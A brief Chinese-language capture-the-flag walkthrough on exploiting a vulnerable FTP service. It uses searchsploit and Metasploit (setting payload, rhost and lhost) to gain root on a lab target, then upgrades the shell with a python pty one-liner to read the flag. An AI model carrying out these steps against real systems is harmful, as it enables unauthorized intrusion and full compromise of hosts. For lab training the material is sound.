FTP、File transfer protocol文件传输协议,同时它也是一个应用程序。下载和上传就是用这个协议。
searchsploit +版本
查看漏洞信息,找到可利用的溢出代码
需要修改这个文件造成溢出
使用Metasploit进行溢出(用msfconsole打开)
1、输入search对应软件和版本号
2、use exploit
3、查看可以使用的payload (show payload)
4、set payload
5、设置参数 show options 、set rhost(靶机ip)、 set lhost (本机ip)
6、进行远程溢出(exploit)
7、执行命令 id,发现获得的直接是root权限
然后用python优化界面,查看root目录下的flag获得flag值。
python命令python -c "import pty;pty.spawn('/bin/bash')"